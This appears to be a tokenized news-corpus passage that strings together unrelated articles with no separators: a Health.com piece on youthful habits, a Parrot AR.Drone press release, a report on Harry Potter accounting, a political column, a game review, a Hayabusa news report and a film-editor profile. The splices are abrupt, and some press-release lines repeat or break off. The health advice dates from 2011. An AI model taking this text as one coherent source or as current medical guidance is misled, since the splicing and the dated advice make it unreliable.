In most industries , such behavior is frowned - upon ; in the market for governance , the default assumption seems to be that competition is harmful and collusion is the only response .
International trailer for Micmacs .
Bazil ( Danny Boon ) , a man whose father was killed by a roadside bomb , is hit by a stray bullet in a freak drive - by shooting incident .
When he gets out of the hospital without a job or any money , he falls in with an ex-con who lives in a scrap dump and makes plans to get revenge on those responsible .
( Health.com ) --
Let 's be honest :
Many of us -- OK , most of us -- were n't exactly paragons of health in our youth .
And we can't help wondering :
Will those margaritas , junk - food binges , forgotten condoms , or even that one bong hit eventually come back to haunt us ?
" I cringe when I think of the abuse I heaped on my body when I was younger -- smoking , drinking , using tanning beds , " says Stephanie Marchant , 43 , a marketing consultant in Woodstock , Georgia .
" I 'd like to try to repair the damage , but I wonder how much I can do at this point .
Is the damage already done ? "
To find out just how worried Marchant and the rest of us should be , we took our fears straight to the people who should know : health experts who 've studied the long - term effects of those youthful bad habits .
What they say may surprise -- and reassure -- you .
Health.com : Ca n't stop coughing ?
8 possible reasons
In your past :
You loved to party -- with a margarita in your hand .
It 's no big deal if ... you overdid it once in a while in college or your 20s , but you 're a moderate drinker now .
One can have a drink every day without dire consequences .
The liver has a wonderful ability to regenerate , so unless you inflicted years of damage , you 're probably OK .
It might matter if ... you used to binge nightly ( defined as four or more drinks in about two hours ) , or you 're still having multiple drinks each day .
" Binge drinking can kill neurons in the brain , affecting decision - making , learning , and memory .
The more you do it , the greater the risk , " says Dr. Fulton Crews , Ph.D. , director of the Bowles Center for Alcohol Studies at the University of North Carolina at Chapel Hill School of Medicine .
Plus , because the liver is responsible for breaking down alcohol and clearing it from the body , heavy drinking -- more than a few drinks a day for over 10 years -- can cause hepatitis , cirrhosis , and liver cancer .
Experts also say that more than a drink a day increases the risk of breast cancer .
To start fresh :
Get an hour of aerobic exercise most days of the week ( brisk walking counts ) .
It can help new neurons grow in the brain , which may reverse some damage from past alcohol abuse .
Drink in moderation -- no more than one a day .
" If you 're more saintly now , you 've probably started to reverse your cancer risk , " says Dr. Joel B. Mason , M.D. , professor of medicine and nutrition at Tufts University .
Eat a healthy diet .
If you were a heavy drinker , avoid high - protein diets , which can be especially hard on your liver .
Also , get enough B vitamins -- such as folate ( in leafy greens , beans , and whole grains ) , which research has shown may lower drinkers ' risk of breast cancer .
Health.com : 10 types of food that can make you sick
In your past : You lived on fast food .
It 's no big deal if ... you ate a couple of fast - food meals a week in your teens and 20s .
A little junk food wo n't hurt you long term .
It might matter if ... you hit the drive - through nightly .
If you spent years eating as if the basic food groups were burgers , fries , and pizza ( loaded with saturated fat ) , or snacking on nothing but store - bought cookies and chips ( trans - fat heavy ) , it 's safe to say you ate too much bad fat .
" A high - fat diet can pose a serious risk for heart disease , " says Dr. John P. Foreyt , Ph.D. , director of the Behavioral Medicine Research Center at Baylor College of Medicine .
" Fortunately , studies show that you can reverse arterial damage if you change your diet and get more exercise , and even small changes can have significant effects . "
To start fresh :
Make healthy substitutes .
" Do n't go cold turkey , " Foreyt suggests , " because it will only increase your cravings for these foods . "
Instead , step back gradually .
If you drink whole milk , for instance , work down to 2 percent , then 1 percent , then skim .
Have your cholesterol checked .
If it 's high , take steps to lower it : Follow a high - fiber diet rich in fruits , vegetables , and whole grains , and low in saturated fat and trans fat ; and work out regularly , with at least 30 minutes of aerobic exercise most days of the week .
If your levels are still too high , your doctor may prescribe statins or other cholesterol - lowering drugs .
Check your BMI .
( An easy calculator is at NHLBISupport .com / bmi . )
If it 's above 25 and you 're overweight , try to drop some pounds .
Losing even 5 percent of your body weight can lower your risk of diabetes , says Joyce Lee , M.D. , MPH , assistant professor of pediatric endocrinology at the University of Michigan .
Health.com : 8 reasons why carbs help you lose weight
In your past :
You spent your summer weekends soaking up the sun sans SPF .
It 's no big deal if ... you 've been religious about SPF 30 for the past decade or more .
You still damaged your skin ( sorry ! ) , but you 're certainly better off than those who 've never given up unfiltered sun worship .
It might matter if ... you tanned for years ( or still do ) .
The sun 's ultraviolet rays not only erode collagen and elastin ( the skin 's structural supports ) , causing premature signs of aging , but also cause mutations in its cells ' DNA .
Although most damaged cells die , some can replicate , giving rise to skin cancer .
" The generation of women who grew up in the '60s and ' 70s , before the safe - sun message was out there , may get more skin cancer than any in history , " says Dr. Ellen Marmur , M.D. , author of " Simple Skin Beauty " and chief of dermatologic and cosmetic surgery at The Mount Sinai Medical Center in New York City .
And , she says , if you went to tanning salons , your risk may be especially high :
Even a few sessions can increase your risk of melanoma .
" If you regularly find new moles and have had pre cancerous growths called actinic keratoses , those are signs that your body has n't responded well to the sun , " says Dr. Jason Reichenberg , M.D. , associate program director for the University of Texas Southwestern Department of Dermatology in Austin .
To start fresh :
Protect your body every day by applying a shot - glass - size amount of sunscreen , SPF 30 or higher .
Even if you 're just starting now , it can pay off big - time by preventing pre cancerous moles from becoming cancerous .
Check your skin monthly for suspicious moles -- ones that are asymmetrical , have irregular or indistinct borders , or are more than one color or an unusual color ( black , blue , red , or white ) .
Do n't forget your scalp , privates , and the bottom of your feet , because melanoma can turn up in places the sun rarely hits .
Moles that bleed , itch , or are painful are red flags , too .
If you 're concerned , call your dermatologist and tell the receptionist you found a potential skin cancer so he or she will get you in ASAP -- important because if you catch skin cancer early , the better your prognosis is .
See your dermatologist every two years -- more often if you have factors that put you at increased risk of skin cancer , such as a family history .
If you have precancerous changes , ask about the new generation of prescription creams that can help the skin repair those lesions .
As for wrinkles and age spots , you can turn back the clock with everything from prescription Retin - A to bleaching creams .
" Different skin types respond to treatments and formulations differently , " Reichenberg says .
A dermatologist can evaluate your skin for the most effective approach .
Health.com : sunproof your skin from a to z
In your past :
You used to be a social smoker .
It 's no big deal if ... you only smoked , say , 10 cigarettes a week for a few years ( at parties , over coffee with friends , or when you were super - stressed ) .
It might matter if ... you were a heavier smoker -- smoking a pack a day for 10 years or more .
Your lungs could be significantly impaired now -- enough so you might notice you can't breathe easily during exercise or you 're more prone to pneumonia or bronchitis .
" Your risk of smoking - related illnesses , such as emphysema , heart disease , and lung cancer , is related to how much you smoked and how long , " says Dr. Norman Edelman , M.D. , chief medical officer of the American Lung Association .
There may also be damage to your arteries , increasing your chances of heart disease and stroke , though the longer you 're smoke - free the more your body will heal .
For instance , even if you smoked like a chimney , your elevated risk of heart disease and stroke decreases dramatically in the first 15 years after quitting , and your risk of lung cancer returns to nearly that of a nonsmoker .
And , yes , if you lived with a smoker or spent lots of time in smoky bars , you increased your risk of smoking - related illnesses , including heart disease and cancer -- but not as much as if you actually smoked yourself , Edelman says .
And once you 've left those smoky environments behind , your risk should drop toward normal after 10 to 15 years .
To start fresh :
Talk to your doctor about any respiratory problems , like trouble breathing , catching your breath , or chronic coughing .
She may suggest a pulmonary - function test to rule out serious issues -- which would go a long way toward calming your fears , too .
Do an hour of aerobic exercise most days of the week .
" Aerobic exercise strengthens your heart and muscles , which helps compensate for any impairment in the lungs , " Edelman says .
Eat plenty of antioxidant - rich leafy greens ( like spinach , kale , and Swiss chard ) , as well as fiber - rich foods .
Antioxidants are good for the lungs , and French researchers have found that people who eat lots of fiber have a lower risk of developing chronic lung disease , regardless of their smoking history .
Health.com : how to buy the right air cleaner
In your past :
You had a one - night stand ( or two ) without protection .
It 's no big deal if ... it was a very rare event .
True , even a single heat - of - the - moment lapse is enough to pick up a sexually transmitted infection ( STI ) -- including HIV -- but the odds are very low if you 've since tested negative .
It might matter if ... it happened often .
The more partners you had -- especially if you were careless about using condoms -- the greater your risk of a STI , and you might not have even known you were infected .
Chlamydia and gonorrhea are often asymptomatic and left untreated can cause pelvic inflammatory disease , a leading cause of infertility and ectopic pregnancy .
Genital human papillomavirus ( HPV ) , the most common STI , is also spread through unprotected sex .
The body clears most cases on its own within two years , but certain types can linger and cause genital warts or even cervical cancer .
And before age 20 or so , your cervical cells were more susceptible to infection .
You could also have contracted genital herpes , usually caused by herpes simplex virus type 2 , which often produces few or no symptoms .
About 26 percent of women in their 40s are infected , according to Dr. Jeanne Marrazzo , M.D. , associate professor of medicine at the University of Washington .
" It can cause periodic outbreaks of genital sores , but the greatest risk is during childbirth , when an active infection can be transmitted to your newborn , with potentially fatal consequences . "
Herpes also makes you more susceptible to HIV infection if you have sex with an infected partner .
To start fresh :
Ask your doctor for blood tests to check for STIs to give you peace of mind .
Some doctors may also offer a rapid HIV test that detects antibodies in your saliva and can provide results in as little as 20 minutes .
Get regular Pap smears , which can detect precancerous changes to your cervix .
Cervical cancer is so slow - growing that it might not show up till your 40s or 50s , even if you were exposed to the human papillomavirus years before .
If you have a normal Pap test three years in a row , you can wait three years for your next one -- unless you have symptoms like bleeding between periods or unexplained discharge .
Be frank with your obstetrician about your sexual history if you 're pregnant or planning on getting pregnant .
It 's important for the doctor to know if you have herpes , so she can be on the lookout for signs of an active outbreak during delivery and do a C - section if she sees something suspicious .
Use condoms regularly if you 're with a new partner , even if you 're in your 30s , 40s , or beyond , because you can get , or spread , an STI at any age , Marrazzo says .
Health.com : Birth control for women over 30
In your past : You smoked pot .
It 's no big deal if ... you did it once in a while .
A bong hit now and again is n't a worry ( phew ! ) .
It might matter if ... you lit up regularly .
" If you smoked marijuana daily for 20 years or so , you may develop permanent respiratory problems , like chronic cough and shortness of breath , " says Dr. Harold Kalant , M.D. , Ph.D. , professor emeritus in pharmacology at the University of Toronto .
Marijuana may also increase the risk of lung cancer , but long - term use -- 10 years or more -- seems to be the most damaging .
And daily users might be left with mild but lasting memory problems .
To start fresh :
Get an hour of aerobic exercise most days of the week -- it 's good for your lungs , as well as your brain .
In your past :
You binged , then starved -- that is , did some extreme dieting .
It 's no big deal if ... you gained and lost more than 10 pounds a couple of times but have since maintained a more or less stable weight for the last decade or two .
It might matter if ... you lost and regained more than 10 pounds many times over the years .
Those feast - or - famine cycles may have subtly slowed your metabolism and diminished your ability to recognize your body 's hunger and satiety signals -- making it easier for you to gain weight now , says Dr. Cynthia Bulik , Ph.D. , director of the University of North Carolina Eating Disorders Program and author of " Crave : Why You Binge Eat and How to Stop . "
Frequent yo - yo dieting can also up your risk of gallstones and may weaken your immune system .
Researchers found that repeated weight loss seems to decrease the activity of natural killer cells , which help your body fend off illnesses .
The good news : Women who maintained the same weight for five or more years had 40 percent greater natural killer cell activity than those whose weight had been stable for less than two years .
To start fresh :
Lose weight gradually , so you have the best shot at keeping it off .
Gradual weight loss also reduces the risk of gallstones .
Avoid extremely low - fat diets ( some fat is good ; it stimulates the gallbladder to contract and empty ) .
And get plenty of fiber and calcium , which may lower the risk of gallstones , as well .
Do an hour of aerobic exercise most days of the week .
It will help you keep your weight in check and may blunt the negative effects of weight loss on your immune function .
Manage your stress with your favorite relaxation method -- whether it 's taking a walk , doing yoga , or reading .
" Those with a history of bingeing are more likely to relapse when stressed , " warns Dr. Mary Boggiano , Ph.D. , associate professor of psychology at the University of Alabama at Birmingham .
So that knitting project or book club is n't just good for your mind ; it can also help you maintain a healthy weight .
Copyright Health Magazine 2011
The first quadricopter for video games and piloted by Wi-Fi will be available in the U.S. in September under $ 300
Parrot , leader in wireless peripherals for mobile phones , today unveils at E3 Expo in Los Angeles the final version of the Parrot AR .
Drone , a quadricopter using augmented reality and piloted with an iPod touch® , an iPhone® or an iPad™ .
With super intuitive handling , Parrot AR .
Drone achieves spectacular flights and enables consumers to play video games in augmented reality .
You are piloting a one - of - a - kind quadricopter , where real and virtual worlds meet to offer unparalleled gaming experiences …
The front - camera broadcasts and streams what the drone is seeing onto the iPod touch or iPhone screen ; and the image processing allows integrating real - time special effects of augmented reality .
Pattern Ergonomic piloting
With its shaped cockpit driven by four propellers with brushless motors , the Parrot AR .
Drone offers excellent maneuverability and stability during piloting .
Parrot AR .
Drone generates its own Wi -Fi network ( no need for an Internet connection nor a router ) at which you simply connect an iPod touch or iPhone .
Once the “ AR. FreeFlight ” application has been downloaded , the iPod touch / iPhone turns into a true piloting station .
Two piloting modes are available :
Beginner : two tactile piloting buttons to control the accelerometer / the direction of the drone and to maneuver .
: two tactile piloting buttons to control the accelerometer / the direction of the drone and to maneuver .
Ace : expert mode with a single tactile button to pilot the AR .
Drone .
Touch the take - off button on the screen of the iPod touch / iPhone and the Parrot AR .
Drone starts its engine , takes - off , stabilizes a few feet from the ground and waits for the pilot ’s instructions .
The player needs to put his / her left thumb on the screen and a control button will position under it .
The accelerometer of the iPod touch / iPhone is detecting movements .
Parrot AR .
Drone moves forward , back or sidewise depending on the inclinations of the iPod touch / iPhone .
Another command button on the right of the iPod touch / iPhone screen enables the pilot to make the AR .
Drone rise , go down or rotate .
In Ace mode , a single button enables the pilot to fully control and pilot the AR .
Drone .
Touch the landing button and the quadricopter will land and stop its engines .
A unique high - tech quadricopter
Parrot AR .
Drone is made of carbon fiber and high resistance PA66 plastic .
The heart of the AR .
Drone contains MEMS ( Micro Electro Mechanicals Systems ) , three axes accelerometer , two gyrometers [ one axe & two axes ] , one ultrasound sensor and two cameras :
The first camera , located underneath , is connected to an Inertial Measurement Unit .
Thanks to this unit , the AR .
Drone is capable of measuring its horizontal speed and performing mind - blowing stationary flights .
The system of images comparison enables it to compensate turbulences due to the wind during outside flights .
These technologies are usually used for professional or military applications and have been adapted to gaming universe for the first time .
, located underneath , is connected to an Inertial Measurement Unit .
Thanks to this unit , the AR .
Drone is capable of measuring its horizontal speed and performing mind - blowing stationary flights .
The system of images comparison enables it to compensate turbulences due to the wind during outside flights .
These technologies are usually used for professional or military applications and have been adapted to gaming universe for the first time .
The second camera , at the front of the quadricopter , broadcasts and streams on the iPod touch / iPhone screen what the drone is seeing as if the player was in the pilot ’s position .
This camera plays a major role for video gaming thanks to the use of form recognition : it enables augmented reality .
For example , the front camera will recognize another AR .
Drone in the game battle between two quadricopters , or tags which will turn into obstacles , monsters or robots on the screen of the iPod touch / iPhone .
Video streaming has been enhanced compared to the development version of AR .
Drone introduced at CES .
Also , the front of the hull has been strengthened to better protect the camera .
The players can choose the camera they prefer or display the two cameras simultaneously on the screen of the iPod touch / iPhone .
New rules for games
With the AR .
Drone , Parrot is combining the worlds of video gaming and radio - controlled models .
This one - of - a - kind quadricopter enables consumers to recreate a large number of video games in the real world and also offers a multi-player possibility thanks to augmented reality .
To offer pilots unprecedented gaming experiences , three games will be available for download in the App Store℠ :
AR .
FreeFlight
Application that is mandatory to fly and pilot the AR .
Drone .
Two piloting modes : beginner or expert .
Downloadable for free on App Store .
AR .
Dronegate
Solo game using augmented reality .
Requires the two tags provided in the box .
Story :
After the successful downloading of photons , scientists try the same experience with matter .
The first try is a catastrophe , a number of scientists disappear and a black hole forms accidentally .
This is the “ Grey Zone ” .
Military - researchers create a radio - commanded device able to bear the extreme conditions of the Grey Zone .
But since , unexplained attacks occur on the facilities .
Mission : Protect your military base and destroy “ enemies ” .
$ 2.99 USD on App Store .
AR .
FlyingAce
Story :
For the first time , you will be able to use a radio - commanded quadricopter to conduct aerial battles of World War II aces proportions .
$ 2.99 USD on App Store .
A new look for inside and outside flights
Parrot AR .
Drone is designed for flying inside and outside .
For a flight outside , a shaped hull reduces the area to the wind and offers an extreme maneuverability of the quadricopter .
Three hulls are available :
orange and yellow
orange and green
orange and blue
These vivid colors enable the pilot to easily follow the movements of his / her AR .
Drone .
They are also easily recognized by the front - camera of the AR .
Drone , which enables the AR .
Drone to identify a competitor for two - player battles .
For indoor flight , a specific hull – with a white , gray and black cockpit- surrounds and protects the propellers if the AR .
Drone hits an obstacle .
Stickers , with colors similar to the shaped hull , can be fixed on each arch to enable drone battles inside .
Finally , electroluminescent diodes ( green at front , red on the back ) , are positioned on the landing gear and enable the pilot to easily position his / her AR .
Drone for piloting .
These diodes also activate and react according to the action from the game .
A community of pilots
Available via www.ardrone.com, AR .
Drone - Pilot Academy will be a website dedicated to Parrot AR .
Drone users and fans .
This website will showcase approximately 20 videos and detailed information on the AR .
Drone .
Training Zone
This area of the website accompanies the pilot , from the first encounter of the AR .
Drone to tips for piloting .
How to prepare your AR .
Drone ( installation of the battery , configuration Wi-Fi / iPod touch - i Phone… ) , pilot ( control of the accelerometer … ) , do sophisticated maneuvers ( circles , figure - eight , half - turn , slalom , obstacles race … ) , practice aerial battle ( offensive and defensive maneuvers , indoor and outdoor battles … ) .
This area of the website accompanies the pilot , from the first encounter of the AR .
Drone to tips for piloting .
How to ( installation of the battery , configuration Wi-Fi / iPod touch - i Phone… ) , ( control of the accelerometer … ) , do ( circles , figure - eight , half - turn , slalom , obstacles race … ) , practice ( offensive and defensive maneuvers , indoor and outdoor battles … ) .
Community Zone
Here pilots will be able to post their videos , share and discuss on forums , follow AR .
Drone news ( via Facebook , Twitter … ) .
An open development platform
Since the introduction at CES 2010 , the Software Development Kit , which was updated in May 2010 , is available for developers to create games for the AR .
Drone .
Source code porting on other platforms is also feasible from the SDK .
To date , more than 450 developers around the world have registered on Parrot AR .
Drone platform .
The only bounds of the forthcoming games for the AR .
Drone are the imagination and ingenuity of the fans of Parrot ’s quadricopter .
To download the SDK or get more information , visit http://projects.ardrone.org.
Parrot AR .
Drone : a technological first
The development of the AR .
Drone required more than four years and the creation of about 20 patents .
For the first time , a consumer product encompasses :
A quadricopter made of carbon fiber and high resistance PA66 plastic , with 4 brushless engines embedded .
An inertial unit with MEMS ( Micro- Electro - Mechanical Systems ) combining video processing with an automatic piloting software to ensure a very intuitive piloting of a radio controlled object .
Wi-Fi and video streaming for a modern gaming interface with an iPod touch / iPhone .
Images processing software for augmented reality .
Parrot has worked for 15 years on wireless technologies .
Engineering is the keystone of the work of Parrot and the R&D department of the company consists of 150 engineers .
Parrot concentrates on the maintenance of its investments in R&D to a high level , with an important focus on the software and the signal processing .
Parrot develops complete products in taking care of their use ; because of this , software , electronics , design and also manufacturing costs are the daily work of the research department .
Parrot AR .
Drone Invasion Plan
Parrot AR .
Drone will be available for purchase at selected retailers * in September in the United States for $ 299 MSRP .
Availability in Europe and Asia will be announced in the following weeks .
* For more information , please go to www.parrot.com
* * *
For more information , visit www.parrot.com or contact :
EXCLUSIVE : Signing a deal that makes anyone a net profit participant in a Hollywood movie deal has always been a sucker ’s bet .
In an era where studios have all but eliminated first dollar gross and invited talent to share the risk and potential rewards , guess what ?
Net profit deals are still a sucker ’s bet .
I was slipped a net profit statement ( below ) for Harry Potter and The Order of the Phoenix , the 2007 Warner Bros sequel .
Though the film grossed $ 938.2 million worldwide , the accounting statement below conveys that the film is still over $ 167 million in the red .
( Text continues below … )
I ran the data above by several attorneys and agents , who are so accustomed to seeing studio accounting wave magic pencils over hit movies that they were n’t surprised even a Harry Potter film that grossed nearly $ 1 billion would fall under the spell .
Dealmakers say studio distribution fees are a killer , as are incestuous ad spends on studios ’ sister company networks .
They also cited the $ 57 million in interest charges , an enormous pushback on profitablity .
Since Warner
Bros did n’t invite in a co-financing partner on the Potter films , has the studio borrowed money from parent company coffers ?
Are they paying that interest to a bank , or to themselves ?
Bottom line : nearly $ 60 million in interest for the estimated $ 400 million required to make and market Harry Potter , charges carried for about two years , is a high tariff .
As one dealmaker tells me : “ If this is the fair definition of net profits , why do we continue to pretend and go through this charade ?
Judging by this , no movie is ever , ever going to go to pay off on net participants .
It ’s an illusion to make writers , and lower - level actors and filmmakers feel they have a stake in the game . ”
And yet Warner Bros is n’t doing anything differently here than is done by every other studio .
Clearly , nothing has changed since Art Buchwald successfully sued Paramount over the 1988 hit Coming to America when the subject of net participation was scrutinized , and a judge called studio accounting methods “ unconscionable ” .
The Pew Research Center for the People and the Press just released a survey testing reactions to political rhetoric — whether people react positively or negatively to words like “ progressive ” or “ socialism ” or phrases like “ states ’ rights ” or “ civil liberties . ”
The results were not surprising in some regards .
Say the phrases “ civil rights , ” “ civil liberties ” and “ states ’ rights , ” and between 87 percent and 77 percent of people respond positively .
Even the word “ progressive , ” which the right - wing machinery on Fox and friends is doing its best to turn into a slander , gets a 68 percent positive response , including 56 percent of Republicans .
Pierre Reads the Column , Accents and All[ media id=23 width=250 height=100 ]
Here ’s where it does get interesting .
The word “ capitalism ” gets barely a majority endorsement , with just 52 percent giving it a positive nod overall .
It ’s still better than the reaction to socialism , but not by much .
Some 29 percent , or almost a third of Americans , view socialism positively , and a far larger proportion of younger Americans do so .
A majority of young people 18 to 29 do n’t see capitalism positively .
Capitalism gets a 43 percent positive rating from those young Americans .
So does socialism .
Looking at reactions according to family income is even more telling .
In households where income is $ 75,000 or less , which is to say in more than 70 percent of American households , just 47 percent have a positive reaction to capitalism .
It ’s a long way from 1989 , when the Berlin Wall was falling , the Soviet Union was disappearing , the first George Bush was advertising “ a new world order ” and the happy ideologues of the right were declaring the end of history .
Capitalism , they told us then , had won .
There was no other viable system .
The Chinese must have been laughing then , as they have since Ronald Reagan first came to them , hat in hand , to help finance his colossal deficits .
Their laugh has gotten only louder since as they ’ve watched a capitalism system gorged on its own arrogance run up more debt than it will ever be willing to repay while inflating bubble after bubble to give itself the illusion that it was still a functioning system .
In Reagan ’s time it was the junk - bond bubble , which crashed in 1987 .
It was followed by the tech bubble of Clinton ’s 1990s , which crashed in 2000 , only to be rolled - over into the housing and junk - credit bubble of the Bush years .
That one is still crashing , with reverberations all over the world , as last week ’s mini-crash reminded us .
All along , the Chinese , whose economy and political system have more in common with fascism than communism anymore , have been lending us money in the shape of a noose — more than $ 1 trillion if you include what we owe Hong Kong , which the Chinese devoured in 1997 .
Incapable of living within our means or raising taxes to pay our own debts , we ’ve been hanging ourselves with Chinese rope .
And not just Chinese .
We owe the Japanese $ 768 billion , and we owe oil producing Arab nations and Venezuela $ 218 billion .
Capitalism did n’t get us into this .
Unbridled capitalism and self - indulgence did , beginning with the rise in the 1980s of the cult of the free market .
To this day conservatives peddle the fallacy that Adam Smith , considered the father of capitalism , would n’t have had it any other way , just as we should n’t have it any other way as we move forward .
But Smith was a great believer in trade unions and public works .
Businessmen ’s motives left him queasy , because he saw them as little more than bundles of self - interest who seldom gave a whit to the common good ( “ It is not from the benevolence of the butcher , the brewer , or the baker that we can expect our dinner , but from their regard to their own interest , ” he wrote . )
And Smith was a great believer in taxes and wealth redistribution so that , in his words , “ the indolence and vanity of the rich is made to contribute in a very easy manner to the relief of the poor . ”
In sum , he would have fit right in with the New Deal , or something like it if the Obama administration had the courage to enact it .
I find it particularly ironic that the group in the Pew survey that gives socialism the most negative marks is the elderly — the one group in America that benefit most from socialist programs : Medicare , Social Security , and the public schools that keep educating the workers who wait hand and foot on elderly lives and luxuries .
We can rail about socialism ’s evil and worship capitalism all we like .
It wo n’t get us out of the hole we spent the last 30 years digging .
History and Adam Smith suggest that the way out is an intelligent , humane combination of the two .
It ’s not like we have n’t done it before .
Ask anyone 65 or older , assuming they ’re not too busy honing their selective memories at a tea party .
Pierre Tristam is FlaglerLive ’s editor .
Reach him here .
Storm Over the Pacific ( SOtP ) is probably not for you .
I say probably because the game is likely to be highly appealing to a very small niche , one that values historical accuracy and meticulous strategic planning .
SOtP , if you did n’t realize by the statement above , is a turn based strategy game .
An easy way to think of it would be as a cheaper version of Hearts of Iron .
It takes place during World War II in the Pacific ( duh ! ) and you can chose to play as any of the nations involved in the conflict .
It makes for an interesting and most of all accurate portrayal of the period , one that other games fail to tackle with as much depth and precision .
That said it does take some liberties .
As many conflicts are history set pieces , it would only be natural ( this being a game ) that they ignore the historical outcome of these conflicts in order to allow the player a chance .
The gameplay takes you back to the truly old - school environment of this genre .
We ’re talking 20 + years ago old - school here .
It revolves around very basic unit movement and management .
Such things as intuitive interfaces , animation or sound effects totally absent .
The map is split up by a hex grid , with each hexagon serving as a “ spot ” .
Different units can move different amounts of hexagons at a time , or attack from different distances .
It all feels very arbitrary and limited .
When you attack , all that happens is you get a message telling you how much damage you did , there are no animations , sounds effects or visual cues what - so - ever .
This is n’t that abnormal for a game like this , but in addition the interface ( though customizable ) is simply horrible .
Starting off the game you ’ll want to run through the relatively short tutorial .
It ’ll be essential if you want to know anything about how to play the game .
You could try to figure it out as you go , but the game has virtually no hint system or any sort of interface description .
That said the tutorial is n’t exactly a cake walk either , as it only provides information at the end of each turn ; information on what to do the next turn .
The problem is that the series of actions you have to complete can be quite extensive and relatively complicated , which would n’t be that bad except that when the turn starts the window of tutorial information is removed and can never be accessed again , essentially requiring you to remember everything .
The game is n’t all about combat though .
You ’ll also have to do some light economy and political management .
This largely boils down to acquiring and distributing Production Points ( PP ) and Diplomacy Points ( DP ) in to various projects and acts .
Some consideration is important when considering the long term vs. short term profits , but this is largely only necessary in the end game or on the harder difficulties .
The computer opponent (s ) can at times be quite aggressive in this area so it ’s important to keep up .
Graphically the game is pretty afoul .
The maps are static and generic , composed of small texture bits strung together to create environments , which individually do n’t even look all that great .
As mentioned above there is no semblance of animation for anything , moving a unit simply teleports it to the next hexagon .
The units and towns are low - res sprites that seem to only have a few variations before they repeat , none of which are particularly interesting or good looking .
The Sound Design is non-existent ; there is one originally scored track that is played in a background , it lasts an hour but it ’s not exactly progressive so you ’ll grow tired of it way too quickly .
There are absolutely no sound effects of note .
In the end however I came to mildly enjoy Storm Over the Pacific , despite all its lacking ’s it has a way of drawing you in .
Sure it takes a few hours but you eventually start caring enough about your game to want to see the end .
I found it very hard however to motivate myself to start up a new game after my first ( and long ) campaign was finished .
There are a bunch of different scenarios to run through , but after you ’ve seen what the game has to offer — doing it all again is n’t all that appealing .
If you ’re in love with the WWII period , if you adore turn based strategy games , if you for some reason ca n’t stand Hearts of Iron and if you could n’t care less about graphics or sound design ; then you should definitely go get Storm Over the Pacific right now .
Everyone else ; Do n’t Bother !
Scientists say a world - first space landing in South Australia 's outback should create a spectacular fireball .
Japanese spacecraft Hayabusa was due to re-enter the earth 's atmosphere around midnight ( AEST ) on Sunday .
It will end a seven - year , five billion - kilometre journey to an ancient far - flung asteroid to collect the first ever asteroid material to be brought to Earth , and it will be Australia 's first ever space landing .
The car - sized probe became the world 's first spacecraft to land on and lift off a celestial body other than the moon after touching down on Itokawa , a " rubble - pile " asteroid 300 million kilometres distant , in September 2005 .
Hayabusa 's on - board devices showed Itokawa was between " several tens of millions and hundreds of millions " years old , and had broken away from an ancient celestial body formed in the Solar System 's most primitive stages .
Lindsay Campbell from the Woomera Test Range says safety precautions will include closing airspace , a section of the Stuart Highway and halting the Ghan Railway .
" We 're told by NASA that this should be quite a solid fireball as the spacecraft re-enters , " he said .
" After a seven year - mission and several billion kilometres , and considering the trouble the poor little thing has had getting home , this is an absolute amazing feat by the Japanese and by NASA who 's helping them to square this thing up and fire it at the right spot on Earth . "
He suggests people watching for a fireball look out for the re-entry of the return capsule , followed a few minutes later by the entry and burn - up of the spacecraft itself .
" JAXA and NASA have confirmed that the actual trajectory of the spacecraft is absolutely spot on , " he said .
" We 've cleared the area underneath where it 's coming in so we certainly have full confidence that everything is going to be perfectly safe . "
A spokesman for the Defence Department said an initial party would fly out to find the 500 kilogram probe once instruments confirmed it had landed .
Among the first people to see it on its return will be local Aboriginal elders , who will fly out in a helicopter to check it has not damaged any sacred sites .
Hayabusa blasted into space in May 2003 tasked with collecting samples from the asteroid 's surface , which it is believed could yield unprecedented information about the evolution of the Universe , and fire them back to Earth in a heat - proof capsule .
But a system to stir up dust malfunctioned and scientists from Japan 's space agency are uncertain what , if anything , the sample canister will contain .
Scientists hope the probe will give them information about the formation of asteroids .
The mission has also been a test for new technology which could be used to return other space samples to Earth in the future .
An international team of astronomers has gathered in the outback to witness the spectacular end to Hayabusa 's journey as it breaks up and is obliterated on re-entry by atmospheric temperatures hotter than the surface of the sun .
Described by NASA scientists as a " man-made meteor " , the spacecraft will glow several times brighter than Venus and appear to skygazers as a luminous shooting star as it melts .
The carbon - coated dust capsule , released before Hayabusa hits the atmosphere , will streak down to Earth at a blistering 1.93 kilometres per second .
Once it is 10 kilometres above the ground the pod will shed its heat shield and deploy a parachute and homing beacon to signal its exact landing location in the Woomera rocket - testing range .
The capsule will be retrieved by helicopter , for air - freighting by jet to ground control at Sagamihara , west of Tokyo , where it will be x-rayed , analysed and finally opened by scientists from Japan , Australia and the US .
- ABC/AFP
“ I took a stress test and they said [ State Department ] I was way too liberal in my thinking . ” -
Three - time Oscar winner Thelma Schoonmaker pictured with long time collaborator Martin “ Marty ” Scorsese
At age six , I declared to my beloved daycare workers Joe and his wife , Ellyann I wanted to pursue a career in either social psychology — a phrase I had seen on one of my mother ’s grad school textbooks — or film - making , if the social psychology racket did n’t pan out .
“ You want to make the costumes ? ” Ellyann asked , a reasonable assumption given I was probably wearing this outfit .
“ No , ” I said taking another sip of juice , “ I want to sit in the bossy chair and hold the camera . ”
Did I mention I was a tad on the precocious side as a child ?
Meanwhile , hundreds miles away , Thelma Schoonmaker sat in her own bossy chair editing the landmark American film Raging Bull , for which she earned an Academy Award .
Like cohort Dede Allen ’s collaborations with Sidney Lumet , Schoonmaker ’s editorial relationship with Martin Scorsese has created some of the most iconic film imagery in history .
Schoonmaker ’s relationship with Scorsese began when she answered a classified ad for a job assisting a hack film editor who was butchering classic French films in order to make the films adhere to draconian American broadcast running times .
Her experiences with the hack editor encouraged Schoonmaker to take a quickie film editing course at NYU where she met Scorsese .
This meeting culminated in their first collaboration — Who ’s That Knocking on My Door ? ( 1967 ) .
Because of restrictive union rules , which stipulated Schoonmaker must jump through a series of hoops before she could gain entrance into the union — hoops , by the way , she ’d already jumped through during the early part of her collaborations with Scorsese — Schoonmaker was unable to cut Scorsese ’s 70s hot streak of films : Mean Streets , Taxi Driver and The Last Waltz .
But times changed ; rules relaxed .
Schoonmaker received a call from Scorsese to cut Raging Bull and they have been collaborators — save Scorsese ’s Dylan film — ever since .
Shutter Island — recently released on DVD — demonstrates Schoonmaker is still the leader of the editorial pack , making the sharpest cuts in the business .
Her passion for technical precision and fluency in film discourse is evident in all her editing choices .
While I did n’t find the story presented in Shutter Island especially engaging , this was a bit of a blessing , as it gave me ample opportunities to study her process and isolate some of the sublime cuts she used in the film .
